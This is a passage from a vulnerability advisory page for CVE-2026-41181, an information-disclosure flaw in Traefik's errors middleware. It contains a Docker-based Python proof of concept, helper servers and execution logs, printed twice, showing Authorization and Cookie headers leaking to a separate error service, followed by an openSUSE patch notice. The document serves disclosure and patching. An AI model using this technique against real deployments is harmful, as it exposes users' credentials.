    stdout = completed.stdout.strip()
    stderr = completed.stderr.strip()
    if stdout:
        print(stdout)
    if stderr:
        print(stderr)
    return stdout


def remove_container(name):
    subprocess.run(["docker", "rm", "-f", name], capture_output=True, text=True)


def detect_network():
    if NETWORK:
        return NETWORK

    output = run_command(
        ["docker", "inspect", TRAEFIK_CONTAINER, "--format", "{{json .NetworkSettings.Networks}}"]
    )
    networks = json.loads(output)
    network_names = sorted(networks.keys())
    if not network_names:
        raise RuntimeError("No docker network found for Traefik container")
    return network_names[0]


def ensure_image():
    run_command(["docker", "pull", DOCKER_IMAGE])


def start_error_container(network_name):
    run_command(
        [
            "docker", "run", "-d", "--name", ERROR_CONTAINER,
            "--network", network_name,
            "-v", f"{ERROR_SCRIPT}:/srv/error.py:ro",
            "-l", "traefik.enable=true",
            "-l", f"traefik.docker.network={network_name}",
            "-l", "traefik.http.services.audit-error.loadbalancer.server.port=8000",
            DOCKER_IMAGE, "python", "/srv/error.py",
        ]
    )


def start_backend_container(network_name):
    run_command(
        [
            "docker", "run", "-d", "--name", BACKEND_CONTAINER,
            "--network", network_name,
            "-v", f"{BACKEND_SCRIPT}:/srv/backend.py:ro",
            "-l", "traefik.enable=true",
            "-l", f"traefik.docker.network={network_name}",
            "-l", f"traefik.http.routers.{ROUTER_NAME}.rule=PathPrefix(`{ROUTER_PATH}`)",
            "-l", f"traefik.http.routers.{ROUTER_NAME}.entrypoints=web",
            "-l", f"traefik.http.routers.{ROUTER_NAME}.priority=100",
            "-l", f"traefik.http.routers.{ROUTER_NAME}.service=audit-backend",
            "-l", f"traefik.http.routers.{ROUTER_NAME}.middlewares=audit-leak",
            "-l", "traefik.http.services.audit-backend.loadbalancer.server.port=8000",
            "-l", "traefik.http.middlewares.audit-leak.errors.status=500-599",
            "-l", "traefik.http.middlewares.audit-leak.errors.service=audit-error",
            "-l", "traefik.http.middlewares.audit-leak.errors.query=/collect",
            DOCKER_IMAGE, "python", "/srv/backend.py",
        ]
    )


def fetch_json(url, headers=None):
    request = urllib.request.Request(url, headers=headers or {}, method="GET")
    try:
        response = urllib.request.urlopen(request, timeout=TIMEOUT_SECONDS)
    except urllib.error.HTTPError as exc:
        response = exc

    with response:
        return json.loads(response.read().decode())


def wait_for_router():
    deadline = time.time() + ROUTER_WAIT_SECONDS
    while time.time() < deadline:
        try:
            data = fetch_json(f"{API_BASE_URL}/api/rawdata")
            if f"{ROUTER_NAME}@docker" in data.get("routers", {}):
                return data
        except Exception:
            pass
        time.sleep(1)
    raise RuntimeError("Timed out waiting for router")


def trigger_request():
    headers = {
        "Authorization": AUTHORIZATION,
        "Cookie": COOKIE,
    }
    return fetch_json(f"{BASE_URL}{ROUTER_PATH}", headers=headers)


def validate(response_json):
    leaked_headers = response_json.get("headers", {})
    leaked_auth = leaked_headers.get("Authorization")
    leaked_cookie = leaked_headers.get("Cookie")

    print("Response JSON:")
    print(json.dumps(response_json, indent=2, sort_keys=True))

    if leaked_auth != AUTHORIZATION:
        raise RuntimeError(f"Authorization not leaked as expected, got: {leaked_auth!r}")
    if leaked_cookie != COOKIE:
        raise RuntimeError(f"Cookie not leaked as expected, got: {leaked_cookie!r}")

    print("Validation result: error page service received the original Authorization and Cookie.")


def main():
    print(f"TARGET={TARGET}")
    network_name = detect_network()
    print(f"Using docker network: {network_name}")

    remove_container(BACKEND_CONTAINER)
    remove_container(ERROR_CONTAINER)

    try:
        ensure_image()
        start_error_container(network_name)
        start_backend_container(network_name)
        wait_for_router()
        response_json = trigger_request()
        validate(response_json)
    finally:
        remove_container(BACKEND_CONTAINER)
        remove_container(ERROR_CONTAINER)
        print("Cleaned up temporary containers.")


if __name__ == "__main__":
    try:
        main()
    except subprocess.CalledProcessError as exc:
        if exc.stdout:
            print(exc.stdout)
        if exc.stderr:
            print(exc.stderr, file=sys.stderr)
        raise

Supporting backend helper used by the PoC, from `customerrors_backend.py`:

from http.server import BaseHTTPRequestHandler, HTTPServer


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(500)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.end_headers()
        self.wfile.write(b"backend forced 500\n")

    def log_message(self, format, *args):
        return


def main():
    HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()


if __name__ == "__main__":
    main()

Supporting error service helper used by the PoC, from `customerrors_error.py`:

import json
from http.server import BaseHTTPRequestHandler, HTTPServer


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = json.dumps(
            {
                "method": self.command,
                "path": self.path,
                "headers": {key: value for key, value in self.headers.items()},
            },
            indent=2,
            sort_keys=True,
        ).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        return


def main():
    HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()


if __name__ == "__main__":
    main()

## Evidence Files `customerrors_middleware.json` proves that the active middleware is the supported `errors` middleware and that it was configured with `status` `500-599`, `service` `audit-error`, and `query` `/collect`.

{
    "errors": {
        "status": [
            "500-599"
        ],
        "service": "audit-error",
        "query": "/collect"
    },
    "status": "enabled",
    "usedBy": [
        "audit-customerrors@docker"
    ],
    "name": "audit-leak@docker",
    "provider": "docker",
    "type": "errors"
}

`customerrors_router.json` proves that the business router `audit-customerrors@docker` was enabled on the `web` entrypoint, routed to `audit-backend`, and used middleware `audit-leak@docker`.

{
    "entryPoints": [
        "web"
    ],
    "middlewares": [
        "audit-leak@docker"
    ],
    "service": "audit-backend",
    "rule": "PathPrefix(`/audit-customerrors`)",
    "priority": 100,
    "observability": {
        "accessLogs": true,
        "metrics": true,
        "tracing": true,
        "traceVerbosity": "minimal"
    },
    "status": "enabled",
    "using": [
        "web"
    ],
    "name": "audit-customerrors@docker",
    "provider": "docker",
    "priorityStr": "100"
}

`manual_curl_customerrors.txt` proves that a direct request through Traefik caused the separate error service to receive the original `Authorization` and `Cookie` values.

HTTP/1.1 500 Internal Server Error
Content-Length: 461
Content-Type: application/json; charset=utf-8
Date: Mon, 13 Apr 2026 13:09:58 GMT
Server: BaseHTTP/0.6 Python/3.12.13

{
  "headers": {
    "Accept": "*/*",
    "Accept-Encoding": "gzip",
    "Authorization": "Bearer audit-secret-token",
    "Cookie": "sessionid=audit-cookie; theme=dark",
    "Host": "127.0.0.1:28080",
    "User-Agent": "curl/8.7.1",
    "X-Forwarded-Host": "127.0.0.1:28080",
    "X-Forwarded-Port": "28080",
    "X-Forwarded-Proto": "http",
    "X-Forwarded-Server": "c231be677a1b",
    "X-Real-Ip": "172.19.0.1"
  },
  "method": "GET",
  "path": "/collect"
}

`poc_customerrors_header_leak.output.txt` is the automated execution log for the Python PoC. The source material provided the following excerpt from that output, which shows the same credential disclosure and the PoC's validation result.

Response JSON:
{
  "headers": {
    "Accept-Encoding": "identity",
    "Authorization": "Bearer audit-secret-token",
    "Cookie": "sessionid=audit-cookie; theme=dark",
    "Host": "127.0.0.1:28080",
    "User-Agent": "Python-urllib/3.14",
    "X-Forwarded-Host": "127.0.0.1:28080",
    "X-Forwarded-Port": "28080",
    "X-Forwarded-Proto": "http",
    "X-Forwarded-Server": "c231be677a1b",
    "X-Real-Ip": "172.19.0.1"
  },
  "method": "GET",
  "path": "/collect"
}
Validation result: error page service received the original Authorization and Cookie.

## Impact Any deployment that uses the supported `errors` middleware with a separate error page service can silently copy end-user credentials to that second service whenever the configured error status range is triggered. In practice, this means bearer tokens, session cookies, and other custom authentication headers can be disclosed to infrastructure that was never meant to receive them. If the error service is maintained by a different team, shared across tenants, hosted by a third party, or simply logged more broadly than the primary application service, this expands the exposure of valid credentials and can enable unauthorized API access or account compromise depending on what the leaked tokens authorize.

Severity ?

6.9 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.11.43"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.44"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.14"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.7.0-rc.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-rc.0"
            },
            {
              "fixed": "3.7.0-rc.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41181"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T19:26:33Z",
    "nvd_published_at": "2026-05-15T17:16:46Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThere is a medium severity information disclosure vulnerability in Traefik\u0027s `errors` (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request\u0027s complete header set, including `Authorization`, `Cookie`, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that `Host` is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the `errors` middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.44\n- https://github.com/traefik/traefik/releases/tag/v3.6.15\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n## Description\nTraefik v3.6.13\u0027s supported HTTP `errors` middleware discloses sensitive request headers to the configured error page service when the original backend response matches the configured status range and the middleware takes its default header-forwarding path. In the reproduced configuration, the business router `audit-customerrors@docker` pointed to backend service `audit-backend`, attached middleware `audit-leak@docker`, and the middleware was configured with `errors.status=500-599`, `errors.service=audit-error`, and `errors.query=/collect`. A request to the business route caused the backend to return `500`, after which Traefik created a secondary request to the error service and copied the original `Authorization` and `Cookie` headers into that cross-service request.\n\nThis is a normal feature path on an ordinary HTTP route. It does not depend on `api.insecure`, the dashboard, pprof, or a debug-only mode. The confidentiality boundary that breaks here is the service boundary between the original backend chain and the separate error page service: credentials that were only meant for the original backend are automatically delivered to another service.\n\nThe root cause is in `pkg/middlewares/customerrors/custom_errors.go:151-160`:\n\n```go\nif len(c.forwardNginxHeaders) \u003e 0 {\n    utils.CopyHeaders(pageReq.Header, c.forwardNginxHeaders)\n    pageReq.Header.Set(\"X-Code\", strconv.Itoa(code))\n    pageReq.Header.Set(\"X-Format\", req.Header.Get(\"Accept\"))\n    pageReq.Header.Set(\"X-Original-Uri\", req.URL.RequestURI())\n} else {\n    utils.CopyHeaders(pageReq.Header, req.Header)\n}\n```\n\nUnless the `NginxHeaders` branch is explicitly used, the middleware copies the entire original request header map into the error page request. The documentation at `docs/content/reference/routing-configuration/http/middlewares/errorpages.md:103-107` only states that `Host` is forwarded by default, so operators are not warned that `Authorization`, `Cookie`, and other authentication material are forwarded as well.\n\n## Steps To Reproduce\n1. Deploy Traefik v3.6.13 with a normal business route that uses the supported `errors` middleware and points `errors.service` to a distinct service. The attached PoC uses `BASE_URL = \"http://127.0.0.1:28080\"`, `API_BASE_URL = \"http://127.0.0.1:28180\"`, `ROUTER_PATH = \"/audit-customerrors\"`, `AUTHORIZATION = \"Bearer audit-secret-token\"`, and `COOKIE = \"sessionid=audit-cookie; theme=dark\"`.\n\n2. Start the two attached helper services `customerrors_backend.py` and `customerrors_error.py`. The backend listens on port `8000` and always returns `500`. The error service listens on port `8000` and returns the request method, path, and received headers as JSON. The PoC starts them with the router and middleware labels below so that the business request is handled by the backend, while the error page is fetched from the separate error service:\n\n```text\ntraefik.http.routers.audit-customerrors.rule=PathPrefix(`/audit-customerrors`)\ntraefik.http.routers.audit-customerrors.entrypoints=web\ntraefik.http.routers.audit-customerrors.priority=100\ntraefik.http.routers.audit-customerrors.service=audit-backend\ntraefik.http.routers.audit-customerrors.middlewares=audit-leak\ntraefik.http.services.audit-backend.loadbalancer.server.port=8000\ntraefik.http.middlewares.audit-leak.errors.status=500-599\ntraefik.http.middlewares.audit-leak.errors.service=audit-error\ntraefik.http.middlewares.audit-leak.errors.query=/collect\n```\n\n3. Confirm that Traefik has loaded the route and middleware. The attached `customerrors_router.json` shows that `audit-customerrors@docker` uses middleware `audit-leak@docker`, and the attached `customerrors_middleware.json` shows that the middleware is enabled with `status` `500-599`, `service` `audit-error`, and `query` `/collect`.\n\n4. Send a request containing sensitive credentials through the business route. The manual reproduction used the following request, and the automated PoC sends the same header values:\n\n```bash\ncurl -i \\\n  -H \u0027Authorization: Bearer audit-secret-token\u0027 \\\n  -H \u0027Cookie: sessionid=audit-cookie; theme=dark\u0027 \\\n  http://127.0.0.1:28080/audit-customerrors\n```\n\n5. Observe that the backend returns `500`, Traefik internally requests `/collect` from the error service, and the error service receives the original `Authorization` and `Cookie` headers. The attached `manual_curl_customerrors.txt` response shows the leaked headers directly, and the attached `poc_customerrors_header_leak.output.txt` execution log shows the same result from the automated PoC.\n\n## Recommendations\nThe default behavior should forward only the minimal context needed to render an error page instead of copying the full original header set with `utils.CopyHeaders(pageReq.Header, req.Header)`. At minimum, Traefik should strip `Authorization`, `Proxy-Authorization`, `Cookie`, `Set-Cookie`, and common custom authentication headers such as `X-Api-Key` before issuing the error page request. If operators truly need additional headers, that behavior should be opt-in through an explicit allowlist rather than the default. The documentation should also describe the current behavior and warn that routing an error page to a separate service can otherwise disclose end-user credentials across service boundaries.\n\n## PoC\nThe main PoC attachment is `poc_customerrors_header_leak.py`.\n\n```python\nimport json\nimport os\nimport subprocess\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\nfrom pathlib import Path\n\n\nTARGET = \"traefik customErrors sensitive header leak\"\nBASE_URL = \"http://127.0.0.1:28080\"\nAPI_BASE_URL = \"http://127.0.0.1:28180\"\nTRAEFIK_CONTAINER = \"traefik-openclaw\"\nNETWORK = \"\"\nDOCKER_IMAGE = \"python:3.12-alpine\"\nBACKEND_CONTAINER = \"traefik-audit-backend\"\nERROR_CONTAINER = \"traefik-audit-error\"\nROUTER_NAME = \"audit-customerrors\"\nROUTER_PATH = \"/audit-customerrors\"\nAUTHORIZATION = \"Bearer audit-secret-token\"\nCOOKIE = \"sessionid=audit-cookie; theme=dark\"\nTIMEOUT_SECONDS = 10\nROUTER_WAIT_SECONDS = 20\n\nEVIDENCE_DIR = Path(__file__).resolve().parent\nBACKEND_SCRIPT = EVIDENCE_DIR / \"customerrors_backend.py\"\nERROR_SCRIPT = EVIDENCE_DIR / \"customerrors_error.py\"\n\n\ndef run_command(command):\n    print(f\"$ {\u0027 \u0027.join(command)}\")\n    completed = subprocess.run(command, capture_output=True, text=True, check=True)\n    stdout = completed.stdout.strip()\n    stderr = completed.stderr.strip()\n    if stdout:\n        print(stdout)\n    if stderr:\n        print(stderr)\n    return stdout\n\n\ndef remove_container(name):\n    subprocess.run([\"docker\", \"rm\", \"-f\", name], capture_output=True, text=True)\n\n\ndef detect_network():\n    if NETWORK:\n        return NETWORK\n\n    output = run_command(\n        [\"docker\", \"inspect\", TRAEFIK_CONTAINER, \"--format\", \"{{json .NetworkSettings.Networks}}\"]\n    )\n    networks = json.loads(output)\n    network_names = sorted(networks.keys())\n    if not network_names:\n        raise RuntimeError(\"No docker network found for Traefik container\")\n    return network_names[0]\n\n\ndef ensure_image():\n    run_command([\"docker\", \"pull\", DOCKER_IMAGE])\n\n\ndef start_error_container(network_name):\n    run_command(\n        [\n            \"docker\", \"run\", \"-d\", \"--name\", ERROR_CONTAINER,\n            \"--network\", network_name,\n            \"-v\", f\"{ERROR_SCRIPT}:/srv/error.py:ro\",\n            \"-l\", \"traefik.enable=true\",\n            \"-l\", f\"traefik.docker.network={network_name}\",\n            \"-l\", \"traefik.http.services.audit-error.loadbalancer.server.port=8000\",\n            DOCKER_IMAGE, \"python\", \"/srv/error.py\",\n        ]\n    )\n\n\ndef start_backend_container(network_name):\n    run_command(\n        [\n            \"docker\", \"run\", \"-d\", \"--name\", BACKEND_CONTAINER,\n            \"--network\", network_name,\n            \"-v\", f\"{BACKEND_SCRIPT}:/srv/backend.py:ro\",\n            \"-l\", \"traefik.enable=true\",\n            \"-l\", f\"traefik.docker.network={network_name}\",\n            \"-l\", f\"traefik.http.routers.{ROUTER_NAME}.rule=PathPrefix(`{ROUTER_PATH}`)\",\n            \"-l\", f\"traefik.http.routers.{ROUTER_NAME}.entrypoints=web\",\n            \"-l\", f\"traefik.http.routers.{ROUTER_NAME}.priority=100\",\n            \"-l\", f\"traefik.http.routers.{ROUTER_NAME}.service=audit-backend\",\n            \"-l\", f\"traefik.http.routers.{ROUTER_NAME}.middlewares=audit-leak\",\n            \"-l\", \"traefik.http.services.audit-backend.loadbalancer.server.port=8000\",\n            \"-l\", \"traefik.http.middlewares.audit-leak.errors.status=500-599\",\n            \"-l\", \"traefik.http.middlewares.audit-leak.errors.service=audit-error\",\n            \"-l\", \"traefik.http.middlewares.audit-leak.errors.query=/collect\",\n            DOCKER_IMAGE, \"python\", \"/srv/backend.py\",\n        ]\n    )\n\n\ndef fetch_json(url, headers=None):\n    request = urllib.request.Request(url, headers=headers or {}, method=\"GET\")\n    try:\n        response = urllib.request.urlopen(request, timeout=TIMEOUT_SECONDS)\n    except urllib.error.HTTPError as exc:\n        response = exc\n\n    with response:\n        return json.loads(response.read().decode())\n\n\ndef wait_for_router():\n    deadline = time.time() + ROUTER_WAIT_SECONDS\n    while time.time() \u003c deadline:\n        try:\n            data = fetch_json(f\"{API_BASE_URL}/api/rawdata\")\n            if f\"{ROUTER_NAME}@docker\" in data.get(\"routers\", {}):\n                return data\n        except Exception:\n            pass\n        time.sleep(1)\n    raise RuntimeError(\"Timed out waiting for router\")\n\n\ndef trigger_request():\n    headers = {\n        \"Authorization\": AUTHORIZATION,\n        \"Cookie\": COOKIE,\n    }\n    return fetch_json(f\"{BASE_URL}{ROUTER_PATH}\", headers=headers)\n\n\ndef validate(response_json):\n    leaked_headers = response_json.get(\"headers\", {})\n    leaked_auth = leaked_headers.get(\"Authorization\")\n    leaked_cookie = leaked_headers.get(\"Cookie\")\n\n    print(\"Response JSON:\")\n    print(json.dumps(response_json, indent=2, sort_keys=True))\n\n    if leaked_auth != AUTHORIZATION:\n        raise RuntimeError(f\"Authorization not leaked as expected, got: {leaked_auth!r}\")\n    if leaked_cookie != COOKIE:\n        raise RuntimeError(f\"Cookie not leaked as expected, got: {leaked_cookie!r}\")\n\n    print(\"Validation result: error page service received the original Authorization and Cookie.\")\n\n\ndef main():\n    print(f\"TARGET={TARGET}\")\n    network_name = detect_network()\n    print(f\"Using docker network: {network_name}\")\n\n    remove_container(BACKEND_CONTAINER)\n    remove_container(ERROR_CONTAINER)\n\n    try:\n        ensure_image()\n        start_error_container(network_name)\n        start_backend_container(network_name)\n        wait_for_router()\n        response_json = trigger_request()\n        validate(response_json)\n    finally:\n        remove_container(BACKEND_CONTAINER)\n        remove_container(ERROR_CONTAINER)\n        print(\"Cleaned up temporary containers.\")\n\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except subprocess.CalledProcessError as exc:\n        if exc.stdout:\n            print(exc.stdout)\n        if exc.stderr:\n            print(exc.stderr, file=sys.stderr)\n        raise\n```\n\nSupporting backend helper used by the PoC, from `customerrors_backend.py`:\n\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(500)\n        self.send_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n        self.end_headers()\n        self.wfile.write(b\"backend forced 500\\n\")\n\n    def log_message(self, format, *args):\n        return\n\n\ndef main():\n    HTTPServer((\"0.0.0.0\", 8000), Handler).serve_forever()\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\nSupporting error service helper used by the PoC, from `customerrors_error.py`:\n\n```python\nimport json\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        body = json.dumps(\n            {\n                \"method\": self.command,\n                \"path\": self.path,\n                \"headers\": {key: value for key, value in self.headers.items()},\n            },\n            indent=2,\n            sort_keys=True,\n        ).encode()\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"application/json; charset=utf-8\")\n        self.send_header(\"Content-Length\", str(len(body)))\n        self.end_headers()\n        self.wfile.write(body)\n\n    def log_message(self, format, *args):\n        return\n\n\ndef main():\n    HTTPServer((\"0.0.0.0\", 8000), Handler).serve_forever()\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n## Evidence Files\n`customerrors_middleware.json` proves that the active middleware is the supported `errors` middleware and that it was configured with `status` `500-599`, `service` `audit-error`, and `query` `/collect`.\n\n```json\n{\n    \"errors\": {\n        \"status\": [\n            \"500-599\"\n        ],\n        \"service\": \"audit-error\",\n        \"query\": \"/collect\"\n    },\n    \"status\": \"enabled\",\n    \"usedBy\": [\n        \"audit-customerrors@docker\"\n    ],\n    \"name\": \"audit-leak@docker\",\n    \"provider\": \"docker\",\n    \"type\": \"errors\"\n}\n```\n\n`customerrors_router.json` proves that the business router `audit-customerrors@docker` was enabled on the `web` entrypoint, routed to `audit-backend`, and used middleware `audit-leak@docker`.\n\n```json\n{\n    \"entryPoints\": [\n        \"web\"\n    ],\n    \"middlewares\": [\n        \"audit-leak@docker\"\n    ],\n    \"service\": \"audit-backend\",\n    \"rule\": \"PathPrefix(`/audit-customerrors`)\",\n    \"priority\": 100,\n    \"observability\": {\n        \"accessLogs\": true,\n        \"metrics\": true,\n        \"tracing\": true,\n        \"traceVerbosity\": \"minimal\"\n    },\n    \"status\": \"enabled\",\n    \"using\": [\n        \"web\"\n    ],\n    \"name\": \"audit-customerrors@docker\",\n    \"provider\": \"docker\",\n    \"priorityStr\": \"100\"\n}\n```\n\n`manual_curl_customerrors.txt` proves that a direct request through Traefik caused the separate error service to receive the original `Authorization` and `Cookie` values.\n\n```text\nHTTP/1.1 500 Internal Server Error\nContent-Length: 461\nContent-Type: application/json; charset=utf-8\nDate: Mon, 13 Apr 2026 13:09:58 GMT\nServer: BaseHTTP/0.6 Python/3.12.13\n\n{\n  \"headers\": {\n    \"Accept\": \"*/*\",\n    \"Accept-Encoding\": \"gzip\",\n    \"Authorization\": \"Bearer audit-secret-token\",\n    \"Cookie\": \"sessionid=audit-cookie; theme=dark\",\n    \"Host\": \"127.0.0.1:28080\",\n    \"User-Agent\": \"curl/8.7.1\",\n    \"X-Forwarded-Host\": \"127.0.0.1:28080\",\n    \"X-Forwarded-Port\": \"28080\",\n    \"X-Forwarded-Proto\": \"http\",\n    \"X-Forwarded-Server\": \"c231be677a1b\",\n    \"X-Real-Ip\": \"172.19.0.1\"\n  },\n  \"method\": \"GET\",\n  \"path\": \"/collect\"\n}\n```\n\n`poc_customerrors_header_leak.output.txt` is the automated execution log for the Python PoC. The source material provided the following excerpt from that output, which shows the same credential disclosure and the PoC\u0027s validation result.\n\n```text\nResponse JSON:\n{\n  \"headers\": {\n    \"Accept-Encoding\": \"identity\",\n    \"Authorization\": \"Bearer audit-secret-token\",\n    \"Cookie\": \"sessionid=audit-cookie; theme=dark\",\n    \"Host\": \"127.0.0.1:28080\",\n    \"User-Agent\": \"Python-urllib/3.14\",\n    \"X-Forwarded-Host\": \"127.0.0.1:28080\",\n    \"X-Forwarded-Port\": \"28080\",\n    \"X-Forwarded-Proto\": \"http\",\n    \"X-Forwarded-Server\": \"c231be677a1b\",\n    \"X-Real-Ip\": \"172.19.0.1\"\n  },\n  \"method\": \"GET\",\n  \"path\": \"/collect\"\n}\nValidation result: error page service received the original Authorization and Cookie.\n```\n\n## Impact\nAny deployment that uses the supported `errors` middleware with a separate error page service can silently copy end-user credentials to that second service whenever the configured error status range is triggered. In practice, this means bearer tokens, session cookies, and other custom authentication headers can be disclosed to infrastructure that was never meant to receive them. If the error service is maintained by a different team, shared across tenants, hosted by a third party, or simply logged more broadly than the primary application service, this expands the exposure of valid credentials and can enable unauthorized API access or account compromise depending on what the leaked tokens authorize.\n\n\u003c/details\u003e",
  "id": "GHSA-p6hg-qh38-555r",
  "modified": "2026-05-15T23:48:29Z",
  "published": "2026-05-04T19:26:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41181"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.44"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.15"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik\u0027s errors middleware forwards Authorization and Cookie headers to separate error page service"
}

OPENSUSE-SU-2026:10713-1

Vulnerability from csaf_opensuse - Published: 2026-05-06 00:00 - Updated: 2026-05-06 00:00

Summary

traefik-3.6.16-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: traefik-3.6.16-1.1 on GA media

Description of the patch: These are all security issues fixed in the traefik-3.6.16-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10713

CVE-2026-41181

Affected products

Recommended 4 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:traefik-3.6.16-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.6.16-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.6.16-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.6.16-1.1.x86_64	—	Vendor Fix

Threats

Impact moderate

References

4 references

URL	Category
https://www.suse.com/support/security/rating/	external
https://ftp.suse.com/pub/projects/security/csaf/o…	self
https://www.suse.com/security/cve/CVE-2026-41181/	self
https://www.suse.com/security/cve/CVE-2026-41181	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "traefik-3.6.16-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the traefik-3.6.16-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10713",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10713-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-41181 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-41181/"
      }
    ],
    "title": "traefik-3.6.16-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-05-06T00:00:00Z",
      "generator": {
        "date": "2026-05-06T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10713-1",
      "initial_release_date": "2026-05-06T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-05-06T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.6.16-1.1.aarch64",
                "product": {
                  "name": "traefik-3.6.16-1.1.aarch64",
                  "product_id": "traefik-3.6.16-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.6.16-1.1.ppc64le",
                "product": {
                  "name": "traefik-3.6.16-1.1.ppc64le",
                  "product_id": "traefik-3.6.16-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.6.16-1.1.s390x",
                "product": {
